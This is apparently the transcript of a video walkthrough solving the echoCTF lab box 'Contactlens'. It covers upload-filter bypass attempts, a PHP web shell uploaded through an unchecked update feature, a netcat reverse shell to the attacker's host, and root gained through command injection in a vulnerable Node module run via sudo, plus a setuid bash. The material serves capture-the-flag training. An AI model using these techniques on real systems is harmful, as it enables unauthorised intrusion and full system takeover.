Hello everyone. In today's video we'll be tackling Contactlens from echoCTF. This box begins with a misconfigured web application. While the upload functionality initially restricts users to image files, it fails to apply the same checks when updating an existing image, allowing us to upload a PHP web shell instead. Once we gain a shell, we discover that our user has sudo privileges to run a custom tool. After a bit of digging, it turns out that the tool uses a vulnerable Node.js module, which is susceptible to command injection. So without further ado, let's walk through the entire process from initial recon all the way to root access. I already am connected with the VPN, as you can see here. And I started the box. It's called Contactlens, as I mentioned. We got our IP, the IP of the box, and first let's read the description to have our hint. So don't miss a contact or lens ever again. We are going to update your existing ones. Okay, so the update word is bold or highlighted, as you can see. So let's run the nmap first. I already did find the port that is open. I forgot we have to create a directory in order to be organized. Contactlens. Let's go into Contactlens, make a directory and call it nmap. Another one, call it fuzz. So we're gonna use VV for double verbose. Our port is 1337. -A to run all scripts. -OA to save the nmap output in all formats inside the nmap directory, and let's call it all scripts. And the IP of the target machine. As you can see here, I already found which port is open in order not to waste time. So let's see what we can get out of from the nmap. So the scan started. We can go ahead because we already know the port till that finishes. It did finish. So let's see the output. So as you can see here, the title of the web server, it seems, as we can see, it's an HTTP, the service that is running on 1337. It seems that is an Nginx web server, and we have the version as well here. And the title of the page is Contact Manager. So let's grab this and put in our notes. I use cherry tree. Let's make a new instance, call it Contactlens or Contactlens. That's the box name. Create a subdirectory and call it nmap. Let's make that black. Okay. Paste in our output. Highlight the important part, which is the whole line right here. Let's make it yellow. And let's make a subnode underneath nmap. HTTP 1337. Okay. Put that there as well. Alright. Let's save that to the directory that we created. New folder, CT, stands for cherry tree. Call it notes. and save. Okay, so let's go ahead and visit the web page and see what we can get back. So let's copy the IP, put that there, 1337. Okay, so first of all, we do know that we're against an Nginx server. Let's find out what language it uses. Most of the times I try to do like index HTML. Okay, it seems that that's okay. Maybe we do index.php. That returns back the same thing. While we try to figure that out, we can start a GoBuster and check for to discover some directories. So let's go to go bin. That is GoBuster. So let's use GoBuster directory mode. Let's use this copy, put it there. Let's do, and then we specify -w for the word list we want to use. User share word list, sec list, discovery, raft, web content. Yep. Raft small words.txt, and let's save the output to directory documents echoCTF Contactlens fuzz and call it raft small words. Let's put the port in front of it -txt. So the error here says that let's read it. The server returns a status code that matches the provided options for non-existing URLs. Okay, and length this. To continue, please exclude the status code or the length. So let's try and exclude this. Exclude the length. So let's run the GoBuster again, and after our word list say --, exclude. Let me make this bigger so you can see the full command. Exclude length and specify the number here, and let's run it again. Okay, right off the bat we can see that we found a new directory called images. Let's go ahead and check that. Images forbidden. Okay, so we cannot access it, but it seems that it exists. We have another one called con. Let's check that as well. Forbidden again. So let's see what let's try and use the application and see what we can do. At contact, it seems that we can upload a contact image. Okay, let's find an image first. Let's open a new pane, go to Contactlens. Let's create a directory and call it tab. So we host our files here. Okay, and in order to find a sample image, we can do sudo locate .png, and I typed that wrong, of course. Okay, so let's grab this image, copy, and put it here. So there we go, we have an image, and let's try to upload it. Documents, echoCTF, Contactlens, tab. Nice. Let's call that dot pirate. Let's put whatever, an email, and an address. Put this and save. Cool. So it seems that we can save it. Saved successfully. Can we open new image? So just by right clicking and clicking open new image, we can see the path that the image is. So despite the fact that we cannot access the directory images, we can access the images if we know the name of the image inside that directory, which is perfect. Okay, now let's try and update, not update, let's try and upload something else rather than an image. Before we do that though, we didn't find out what kind of programming language is that web server using, and that's very important if we want to exploit this server. So let's go to the network tab, reload, and check what happens when we update or delete. Let's see if we delete that. Okay, yeah, let's delete it. And as we can see here, you can see delete.php contact 12. So we know it's using PHP right off the bat. Another way we could find out of the language it uses, we can go ahead and try to run web. Let's get this. And so you can see how we can use web. We can directly put the command web and then the target URL. Also, what I like to do when I use web is to use double verbose so we can get more output. And see what we get back. So we can see it found the version of the Nginx server. We know that already, so that's not that helpful. It didn't find the language type. Okay, what else do we have here? Bootstrap. Didn't find the language. Another way we can find what type of language is the application using, it's by using burp. So let's open burp. Okay. And next. Did our fuzzing finished? Let's see. Okay, that's weird. It returned 200. Is that false positive? Let's try run this and see what we get back. So it seems that doesn't return anything different than the original page. So the fuzzing will not be that helpful at the moment. But let's go ahead and see another way that we can get the language that an application is using. So we can go ahead and open the embedded browser of burp, which is Chromium, as you can see up here. Then take the IP, put it there, and go back to burp and see the HTTP history. So we can go ahead and try to do some action. Let's do add a contact, upload the same image as we did before. Contactlens, sample image, .pirate. Okay. And an address, save changes. And as you can see, we can see that it uses, so your file was not uploaded, but we can see again here that add.php, so we can get the PHP from the URL, and also I think we can see that from burp, right? Can't see anything here, but if we try to do some more actions, maybe we'll get something back. Let's try and upload it, the same image again. Save changes. There we go. We can see that I make it bigger. As you can see here, there is a post request here as well. Endpoint/add.php. So we made sure that the web server is using PHP, the PHP programming language. Let's close that and write that to our notes. So we found out that the Nginx server is using PHP. Great. Let's make that bold. Okay. So my first thought is, since this is running PHP, the path would be to manage to upload a PHP web shell and then visit the images directory and the PHP script, and maybe you can execute PHP code on the server and get a shell like this. So in order to do that, we have to bypass the restrictions, because let's first create here, let's create a test. So we're gonna do nano test.php. Let's do php echo please sub, and see if we can run this. So let's go ahead, browse test.php, .pirate, blah blah blah. Let's do 123.pirate. Save changes. So it seems that we cannot upload a PHP file. Let's try uploading a text file then. Nano test.txt, or we can better do echo test like this. So we do have a test.txt now. Let's try and upload that. Open, save. So again, we cannot upload a txt file as well. So in order to fuzz this and see if the restriction is looking into the contents of the file that we're uploading, or it looks only on the file format. So for example, we can change the name of the test.txt to test.txt.php, for example, and try to upload that. So let's try test.txt.php, save changes. Again, we cannot upload that. Now let's swap those. So what I mean by that is, rather than saying test.txt.php, you can say test.php.txt. No, better, let's do, because we know we can upload images, right? We can try and do test.php.png, for example, right? The reason I'm doing this is because I want to see if the restriction is according to the contents of the file, as I said before, or the type of the file. So we can go ahead and test our theory, save changes, and the file is being uploaded. Let's try and access the file now. Images, test.txt.png. Nothing happens. Did I type that wrong? Okay, yeah, it's test.php.png, not txt. As you can see, cannot display because it contains errors. So we know we can reach that. We uploaded the file. There is a technique where you can put a null terminator here, and maybe we can discard the last type, file type. Let's see if we can find this technique, null terminator. Bypass. Null byte injection. I think that's the. So null byte is a bypass technique for sending data that will be filtered otherwise. There is injecting the null byte character in the supplied data to terminate a string. So we can try, as you can see here is an example that says that counter constructs the file name such as malicious php, then the null terminator.pdf, and uploads the file. So maybe we can use the null terminator and upload the file, and then when we go to execute, it executes PHP code. So let's try doing that. Maybe if we add it here, it will work. Nope. Let's try and call the image, the file is that. So PHP, and then we do test.php. Let's check. So we put the null terminator.png. Here it is. Let's try and upload that. Let's go back, delete this. Let's upload this one. Pirate, this. Save changes. It saved successfully. Let's now copy the name and try to access it. Images, this. So it seems that it shows that this is a bad request, but in order to make sure that the request is probably is probably sending as we expect it to be sent. We can open burp and see what's going on there. So let's copy this, open burp, open our browser. Where is the browser? Target, no, proxy. Where is the browser? Here it is. Bad request. So it doesn't like the null terminator. Let's see. There it is. Maybe if we obfuscate this, dash u. Let's get that to the repeater and do Control U. Okay, send. And we bypassed. As you can see, we got back test. So let me make this bigger so you guys can see. Display, font size, make this 17. And proxy. Is there a way to make that bigger? Let's see. Peter, maybe tab U. How do I make that bigger? Where is from here? Nope. Where is it? I'm so sorry about that. I just want you guys to see clearly what I'm doing there. Repeater. Tab U, maybe it's this one. Nope. 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 Project. Nope. Let's search for it then. How to make burp repeater font bigger. So navigate to display settings within burp, switch user options. Display settings within burp suite user options. User options. Where is that? User settings. Display. Oh, here. Nope. Nope. There it is. HT, so message editor, okay. Change font, make that 17. Okay. I think that's better. So as you can see here, when we let's do Control Z, it was like this when we added the %00, but then when we did Control U, it turned that into %2500, and we managed to return the output of the file that we uploaded. We can go ahead and test that in the browser as well to see the results. So let's turn this into images, test PHP. So it seems that we can get back the output from verb, but we cannot see it here. So because it works though, we can go ahead and upload a PHP shell and see if it works. So let's first of all cut test this. Let's try nano, adding here a PHP script. So PHP echo please sub. Okay, there it is. Let's try re-uploading this. Let's go back. Let's go here. Wait. Okay. Delete this. Add contact. Can upload this. Upload.pirate. Blah blah blah. Yes, yes. Save changes. For some reason, when I tried to upload it from the Chromium thing, it does not upload. So let's try uploading it from regular browser without intercepting that with burp. Can't do that here. So I did a mistake. I think we have to apply the change on the file before we upload it. So let's change this to btest.php %2500. Is that correct? Let's check from the repeater. Yes, 2500.png. Okay. Here we go. And now let's go ahead and upload that. Save changes. It did upload it. So now let's try and visit that and see if we can execute the PHP code. Copy. Nothing happens here. Let's check that with burp. Okay. So let's see. There it is. We still get test back. Oh, it's because the image already exists. Is that what's going on? Okay, let's try changing the name. let's make it test1 dot this. Try re-uploading it. Nope. Delete that. Add test1. Open. Save changes. Nice. Maybe now it works. Nothing happens. Check that with burp. Nothing happens. Let's see. So we're looking for test1. Where is test1? There it is. So this, our bypass didn't work. Okay, we can see what other types of files we can upload other than images. The way we can do that is go ahead and fuzz. So what we can do is let's grab the upload request. I'll explain now. So we get the sample that we know that we can upload, .pirate, blah blah blah. This yeah, let's do that from okay. It seems that current doesn't work. So what we can do is actually go ahead and manually add a proxy. Proxy, there it is, settings, manual 27001 8080. Great. Okay. Now, if we refresh, we'll be able to see that we get the requests here. So let's grab all of these, clear. I can clear it, right? Delete selected items. Okay. Let's try that from the beginning. Delete this. We see the delete request. Can go here. Can go add sample pirate. Yes. Let's intercept that. Oh no. Yes. Okay. So this is a post request on the add. This is the image we're trying to upload. Can go ahead and set that to repeater. And what's the plan now? It's, as you can see here, we can see the name, contact image, and the file name here. What we want to attack is this part right here, the type of file. We can find such a list through sec lists, and we're gonna do this with FUF. So we can also do this with burp as well. So let's do that instead. So we're gonna go ahead and get this part, add a variable there, remove the URL encode characters, and we can go ahead and load our word list. So it's in user, share, checklists, discovery, I think, and there should be file extensions. There it is. Large extensions. I think that it's another one, but is it web extensions? Let's see. Nope. Yeah, there it is. Web extensions. As you can see, this is different type of extension. What we are more interested in is on PHP files. So let's go ahead and start the attack. Let's see the request. Sorry, your file was not uploaded. So for sure we're looking at response that is not 61 or 60. Is 63. Still get the same message. Let's see. So this is what we are interested in. But it doesn't seem that we got something back. Oh, there is something. Wait, PHPS. No, we get the same thing back. Okay. Okay. So we now know that we are only allowed to upload PHP, image file formats. Let's check if there is a file format or an image file format that can execute PHP code as well. So let's check image file formats that can execute PHP code. And because we have the proxy, let's remove it for now. Proxy. Okay. Refresh this. Okay, PHP is not limited to creating just HTML output. It can also be used to create and manipulate image files in a variety of different images. So GIF, PNG, JPEG, blah blah blah. Let's see, persistent PHP payloads in PNG. It says here that during the assessment of a PHP application, we recently came across a file upload vulnerability allowing the interpretation of PHP code inserted into valid PNG files. I think this is what we want. Okay, however, the image processing performed by the application, of course, has to dig deeper into different techniques available in inject PHP payloads in a particular file format and to make it persist. So let's see how can we do that. Okay, simple injections is here. Let's say that the user uploads blah blah blah. Okay. So far so good. However, the image processing feature in this first route presents a critical vulnerabilities. The application uses the original file name of the uploaded image in order to store it. The user controls the extension of the image file on the web server. Okay, an attacker could then easily name a file as a PHP and upload it to application, and it will be stored as this. So it says here that we can actually embed something in the comments. So the PNG image file format allows adding comments to the file to store some. Okay, we can go ahead and try this. So we can go ahead and add a comment using the EXIF tool onto the sample.png, right? And add, okay, let's grab this and try this out, right? So sample png, rather than do php info, I would like to see echo something, echo place up. Okay, how can we check if this is the case? That is the comment there. We can use xxd tool. Let's go ahead and use that, xxd on this, and go ahead and check if that's there. Let's see. There it is. Echo please sub. Okay, so this worked. Let's try and upload that sample image and see how it goes. Delete this again. Add contact. Let's check. This one. Pirate, blah blah blah. Yes, save changes. Cannot upload it. But why? It's a PNG. What's wrong? So it checks the contents as well. Let's see. Cut. Let's take a new PNG and try it this way. What? Let's take this. Into Contactlens. Let's get back here. Okay, there it is. Let's do EXIF tool in that. Okay, this is the original one. This must be the one that has the payload. Let's try and upload this then. Go back. Upload this. But as you can see, it seems that it sees it as PHP. And I don't know why. So by adding in the comments that it knows that it's a PHP. So that will not work for us. Can try this. can try echoing into the normal PNG. So let's do it again. Let's locate another image. Let's take this one, copy that into .up, top right inactive, so it says here that we can echo. Let's see it again. Let's do PHP info into this and see if it recognizes this as a PHP. It does not, it seems. So let's try and uploading this one. Save changes. It did upload. Okay. Let's go ahead and try and visit that then. Copy. And nothing happens. So it did not execute. Okay. So we tried a couple of methods. What's that? Let's run the script. We can now upload the result on the PHP, blah blah blah. So they script it. Okay. Can we upload SVG? Because as I remember, the Google search said that we can upload different formats, right? So where was it? JPEG, GIF. Let's see. We can try this as well. It seems that this is a script that puts PHP code inside and JPEG. Let's try this. So we can go to exploits and have such directory, right? Okay, let's create one. Exploits. Get into that, clone this. Okay. Let's see. So it seems that we need to create Python environment, env source .vem bin activate. Now we are inside the Python virtual environment. Now we can go ahead and run pip3 install -r requirements. Done, and we can now run the script, right? Python 3. Oops. Great. So how do we do that? Let's go ahead and see how they do it here. After installation, you can generate a JPEG file with a PHP payload. Oops, the command structure is as follows. So PHP, generate PHP payload output. Okay, I see. So let's go ahead and try this. Even though I didn't see a PHP script, that's a Python script. What? So it gives me a Python script, but it uses a PHP. I don't get it, dude. Okay, is that a way to do that with Python? Okay. Let's try this and see if it works. I don't know. Can't open home, blah blah blah. Payload generator. Is there a payload generator here? Nope. I don't think that even works. Okay. So there is another functionality that we didn't try yet, which is we can, I think, edit this. So what we can do is try and uploading a PHP this way by through the edit button rather than uploading by on the add contact. So let's get back here and create again nano .php. Let's say do php echo place up, put that there and tie this way. Save changes. It seems that now it allowed us to upload this. We go to images.php and we get execution. So after trying a lot of ways to bypass the upload functionality, there was an easier way. It was to edit the already added contact and upload a new image or update the new image with a PHP script. So the normal functionality of uploading had a restriction, but the update functionality did not have a restriction what we can upload. The reason I went through the whole process of trying to bypass the restriction is because I think it's valuable for someone to know how different ways can be used to upload, to bypass the upload functionality, and instead, rather than uploading an image, try to upload a PHP file. That's why I showed that. But as you can see, we do now have code execution. So let's go ahead and upload a web shell. web shell. Create a new web shell here and do PHP system $_request square brackets quotes, let's call that CMD, and close our PHP script. Upload. Let's go back and re-update the image. It's the web shell. Open, save changes, and go ahead and do images web shell.php. Question mark cmd equals id, and we have code execution. So now let's go ahead and take a reverse shell. I will first try and see if netcat is installed on the box. We can do that by saying which plus nc. Okay, netcat is indeed installed on the box. I'll go ahead and do bin nc plus, which is the space, our IP 10.10.11.150 plus the port we are listening on, in this case it's 443, plus -e to execute, plus bin bash. And we do have a connection. So it seems that we are --data on the box. Let's go ahead and update our shell, our terminal. Go here to upgrade this to robnop. Where is the script? There it is. Didn't work. Maybe Python 2 is not installed. Let's check for Python 3. Yep, so we can use the same command but with Python 3, and now we got a better shell. We can then do, or was it stty row minus echo, there it is, control Z this foreground, okay, and then export term equals xterm. Great. Now let's do a stty new shell, new terminal, just to see our rows and fix it as well. So 30 rows, 133 columns. stty rows 30 calls 133, right? Yes. Great. So first, let's see if we have any dangerous groups. Doesn't seem that. Let's see which users are installed in the box. Gonna go ahead and grab everything that ends with sh. Okay, there is echoCTF, there is a flag, and root. Next, I'm gonna go ahead and check if we have any sudo privileges, and we do have. It seems that we can run this command with sudo privileges without using any password. So let's go ahead and check what we can do with this. I understand that the tool here, it's a custom made tool, and it has the name of the box. However, we can go ahead and check that. First, let's see what we can do with it. Okay, it seems that we need 3 parameters: a URL, OpenSSL, and include SPDY. I don't know what that is exactly. but we're gonna find out. So let's check contactless. Is this Linux 2? Okay, it doesn't seem that this is a known tool, so I assume it's a custom-made tool. We can go ahead and try to read it and see what it does. Let's go check this. Okay, so it seems that this is inside an SLA, or let's go ahead and check that. So it says it's in lib, then node modules, then ISH2, bin, that is cat index.js. What's that? So it's using node, is using a module called is-http2, and we cannot see much here. However, what we can see is that ISH2, it seems that is a function that is using 3 arguments. The first one is the URL, as we saw before, arg0. Then, it's argument 0, which is the first one we put after we call out contactless tool. Then it uses OpenSSL, it seems, and then include SPDY, which I don't know where it is. So let's go ahead and see. If I move a directory back, we can see there are some packages here. If we cut package.json, we'll be able to see the modules much clearer. We can see that this is using 1.2.0. When we Google this, exploit blah blah blah, we can see that there is indeed an exploit for this node module. We can go ahead. This is the CVE number, as you can see here. Let's copy that. And it seems that this is what we have seen before. So let's go in bin again and cat index.js. It seems that if we add a command here in the first argument, we'll be able to execute commands as root. As you can see here, is doing the touch command, which is creating a file called ghu. So let's go ahead and try this. So it seems that if we do sudo this, first put a URL, localhost, let's say, then put once here, which is the OpenSSL, is where we put our command, touch, let's say, from root, and then I don't know, we put true, or what is the last thing, that SPDY thing? Do you know where it is? What is in Linux? So a Linux system includes the kernel, which manages the hardware, the shell, It's a command line interface for the system various applications. Task. I don't know. Let's try a random character and see how it goes. So let's put, I don't know, try. Okay. And we have from root. And it's from root. So with this we can go ahead and can see that we successfully executed the command as root, and we created the file by root. Okay, when I was doing this before, the thing that I was doing wrong is that I understood that the exploit worked this way when I find out that the node module is vulnerable to this kind of attack. However, I wasn't putting the quotes, and then it was confusing how to, make this work. So if I do this, it says that it's pending, but it says here that command fail, ID version, no such user. Okay, however, when we put the quotes and we separate each parameter that the tool requires, again we get this back. However, because this is a command, we can also do, I don't know if I put this maybe. Do we get something? So command open cell not found, please make sure it's installed. Okay. So for sure we can execute commands, but not all of them. So what we can do now is add the sticky bit on the bin bash by doing chmod +s bin bash, and then if we check bin bash, let's see, if we check bin bash, we can see the s is there, so we do know now that is a setuid binary, so we can go ahead and do bin bash -p, and we are root. We can go ahead to root and read the flag. So we did it. So let's go a bit back and make our notes. So let's make our notes here. We found out that the engine server is using PHP. We tried to bypass the upload restriction and upload a PHP file, but we did not make it. However, we found out that the update functionality did not have the same restrictions, so we were able to upload /update a PHP shell, web shell. I cannot type today. Okay, let's make this bold. Okay, let's do a PE, stands for privilege escalation. So it was noticed that our user was able to run the tool using sudo. We found out that the tool is using a vulnerable Node.js module. I don't know if it's called the module or library. Hopefully module is correct. By reading the package.json, then the exploit, let's paste here resource for the POC, and also let's paste the injection we did ourselves. I'll take this, put it here. Let's make this red. Okay, looks better. And let's also put this. So we know how to, we did find it. Let's put that like this. Okay. Great. So that was all from me, guys. Hope you guys enjoyed it and learned something new. Looking forward for the next one. See you guys later. Bye.